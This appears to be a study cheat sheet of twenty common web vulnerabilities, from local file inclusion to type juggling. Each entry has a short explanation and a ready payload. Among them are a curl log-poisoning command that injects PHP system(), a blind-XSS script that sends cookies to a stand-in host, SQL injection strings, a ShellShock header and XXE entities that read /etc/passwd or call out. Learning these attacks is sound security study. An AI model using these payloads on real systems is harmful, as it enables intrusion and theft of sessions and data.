Skip to content

Notes on the Most Common Web Vulnerabilities

1. Local File Inclusion (LFI)

Allows an attacker to include local server files, typically via vulnerable parameters: - https://localhost/myweb.php?idioma=es → https://localhost/myweb.php?idioma=/etc/passwd
Evasion and tricks:

  • If it only allows .txt, try null byte injection:
  • https://localhost/myweb.php?language=/etc/passwd%00.txt
  • %00 terminates the string before .txt is appended internally (old PHP trick, may still work on legacy environments).
  • If restricted to a specific path (/var/www/html/lang/) → Path Traversal:
  • https://localhost/myweb.php?language=../../../../../../etc/passwd (Try also encoded . (%2e) or combinations like %2e%2e/ to bypass filters)

2. Wrappers

PHP has "wrappers" like php://input or data:// that allow accessing streams as if they were files:

  • php://input → Access the request body (POST)
  • data:// → Execute embedded data as a file
  • file:// → Access local files
  • zip://, phar://, glob://, etc.

You can send your own PHP code in the POST body and it will execute.

3. Log Poisoning

With LFI, you can enumerate log files (mostly in /var/log).
If you find access logs, you can execute commands by injecting PHP code in accesses, which will run when the log is included.

curl -s -H "User-Agent: <?php system('whoami'); ?>" "http://localhost/myweb.php?file=/var/log/apache2/access.log"

4. Remote File Inclusion (RFI)

Similar to LFI but allows including remote files, like malicious scripts. Be careful, it only works if allow_url_include is enabled.

5. HTML Injection

Inject HTML (not JavaScript) into a page. Does not execute JS but can be used for phishing or DOM manipulation.

<b>¡Hola admin!</b><form action="...">

It may also allow <img src="javascript:..."> or a trap <form>.

6. Cross-Site Scripting (XSS)

JavaScript injection in web pages. Allows you to: - Steal cookies - Hijack sessions - Modify the DOM - Redirect the user Classic example: <script>alert('XSS');</script>

7. Blind XSS

Similar to XSS, but the payload executes elsewhere (e.g., admin panel). Example: inject: <script>fetch('https://tuyo.com?c='+document.cookie)</script> You won’t see anything, but when the admin opens the page, you can steal cookies.

8. Cross-Site Request Forgery (CSRF)

Trick a logged-in user into performing actions unknowingly (change password, transfers). Example: <img src="http://victima.com/change_password?new=1234" /> → If the session is active, the password changes without consent. Solution: use CSRF tokens and verify methods (GET/POST).

9. Server-Side Request Forgery (SSRF)

Use the server as a proxy to make internal requests (access 127.0.0.1, cloud metadata, etc.). Useful to scan internal networks or access restricted services (internal admin panels, cloud metadata).

10. SQL Injection / Error-Based

SQL injection that reveals useful errors for exploitation:

' OR 1=1 --

If errors are displayed, you can exfiltrate data easily:

' UNION SELECT null, version(), database() --

11. SQL Injection / Time-Based (Blind)

No visible errors, but you can infer responses using functions like SLEEP():

' OR IF(1=1, SLEEP(5), 0) --

If it delays 5 seconds, the injection worked (blind SQLi discovered).

12. Padding Oracle Attack (Padbuster)

Attack against block ciphers (like CBC) using errors to deduce padding and decrypt info. If an encrypted cookie produces different errors depending on padding, it can be decrypted byte by byte. Classic tool: padbuster.pl.

13. Padding Oracle Attack (Bit Flipper / BurpSuite)

Same idea as Padding Oracle, but instead of decrypting, you modify content → flip bits in ciphertext to force a specific result (like privilege escalation). Example: change user=normaluser=admin by flipping bits until the decrypted data grants elevated privileges.

14. ShellShock

Bash vulnerability allowing command execution via environment variables. Affects old CGI servers:

User-Agent: () { :; }; /bin/bash -c 'id'

15. XML External Entity Injection (XXE)

Attack XML parsers that allow defining external entities, letting you read files or perform SSRF. Dangerous for SOAP/XML APIs:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

16. Blind XXE

Like XXE, but you don’t see the response. Use a side channel, such as forcing DNS requests:

<!ENTITY % ext SYSTEM "http://tuo.dominio.com/pwn">

17. Domain Zone Transfer (AXFR)

Obtain the full DNS zone of a domain if the DNS server is misconfigured:

dig axfr @dns.victima.com victima.com

18. Deserialization Attacks

Send serialized data (PHP, Java, Python objects) that executes code when deserialized. PHP example:

O:8:"Exploit":1:{s:4:"data";s:13:"<?php info(); ?>";}

19. Type Juggling

Exploit how PHP (or other languages) compare different types (strings vs ints):

if ($_POST['auth'] == "0e12345") // vulnerable

Authentication bypass.

20. Virtual Hosting

Multiple web subdomains can run on the same port. To enumerate them, you can use tools like wfuzz